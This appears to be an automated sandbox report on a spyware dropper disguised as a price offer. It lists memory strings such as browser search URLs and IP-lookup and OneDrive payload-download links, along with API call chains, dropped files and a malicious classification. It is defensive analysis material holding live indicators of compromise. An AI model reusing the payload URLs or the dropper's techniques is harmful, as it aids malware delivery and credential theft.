Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB66000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EC6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EC6E000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EC6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3ResponseD
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Gastrostomize.exe, 00000004.00000003.1917772979.0000000002A49000.00000004.00000020.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.1905123304.0000000002A49000.00000004.00000020.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2084584439.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.1917689207.0000000002A3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gcwema.bn.files.1drv.com/
Source: Gastrostomize.exe, 00000004.00000003.1905123304.0000000002A49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gcwema.bn.files.1drv.com/d
Source: Gastrostomize.exe, 00000004.00000003.1905123304.0000000002A49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gcwema.bn.files.1drv.com/y
Source: Gastrostomize.exe, 00000004.00000003.1917689207.0000000002A3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gcwema.bn.files.1drv.com/y4mqvM36ByLD9K0VAWLVL6a1k1_p1wIfrODC391i7sxjSbFXZaU8m53aP1PNPBAw-Z2
Source: Gastrostomize.exe, 00000004.00000003.1917772979.0000000002A49000.00000004.00000020.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.1917689207.0000000002A3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gcwema.bn.files.1drv.com/y4mye_Jf7K0w86rbJFL3Cz44mUGm8bynBGyx6Ciamik_PJLoT5oqohZzX2QmYT8NSIF
Source: Gastrostomize.exe, 00000004.00000002.2084584439.00000000029D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/
Source: Gastrostomize.exe, 00000004.00000003.1905123304.0000000002A45000.00000004.00000020.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2085940185.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2084584439.0000000002A16000.00000004.00000020.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2084584439.00000000029D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?resid=F547EE3E8FFF6BF5%21682&authkey=
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FEBB000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE12000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EE7D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2103074293.000000001FD2D000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EEF0000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000003.2060001666.000000001FE2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_0040550F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040550F

System Summary

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Jump to dropped file
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033D8
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_004033D8
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_004072D1 0_2_004072D1
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_00406AFA 0_2_00406AFA
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_004072D1 4_2_004072D1
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_00406AFA 4_2_00406AFA
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_000DD9CC 4_2_000DD9CC
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB89B0 4_2_20CB89B0
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CBEFB8 4_2_20CBEFB8
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB1498 4_2_20CB1498
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB0040 4_2_20CB0040
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB003B 4_2_20CB003B
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB89A0 4_2_20CB89A0
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21DDC128 4_2_21DDC128
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21DDC708 4_2_21DDC708
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21DD3D40 4_2_21DD3D40
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21DDF3F8 4_2_21DDF3F8
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E2B15F 4_2_21E2B15F
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E296C8 4_2_21E296C8
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E2B6A8 4_2_21E2B6A8
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E27660 4_2_21E27660
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E2B999 4_2_21E2B999
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E26928 4_2_21E26928
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E348A0 4_2_21E348A0
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E691EC 4_2_21E691EC
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E65120 4_2_21E65120
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E649A0 4_2_21E649A0
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E6E310 4_2_21E6E310
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E691EC 4_2_21E691EC
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E691EC 4_2_21E691EC
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E941C0 4_2_21E941C0
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E9E698 4_2_21E9E698
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E9BCB7 4_2_21E9BCB7
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E91629 4_2_21E91629
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nst4C1E.tmp\AdvSplash.dll 9CDBA2BB0984F10C201921AE5BCFE7B595771E1F12D9E17D31F213BFAF1548C6
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nst4C1E.tmp\nsDialogs.dll B2699FDFDAB6A018FCC972806D12F71972DE1861660BB6578935D62B1DA06504
Source: Price Offer_1200R4 1200R20.exe Static PE information: invalid certificate
Source: Price Offer_1200R4 1200R20.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/17@2/2
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033D8
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_004033D8
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_004047BF GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004047BF
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_00402198 CoCreateInstance,MultiByteToWideChar, 0_2_00402198
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe File created: C:\Users\user\AppData\Local\Temp\nso4BB0.tmp Jump to behavior
Source: Price Offer_1200R4 1200R20.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
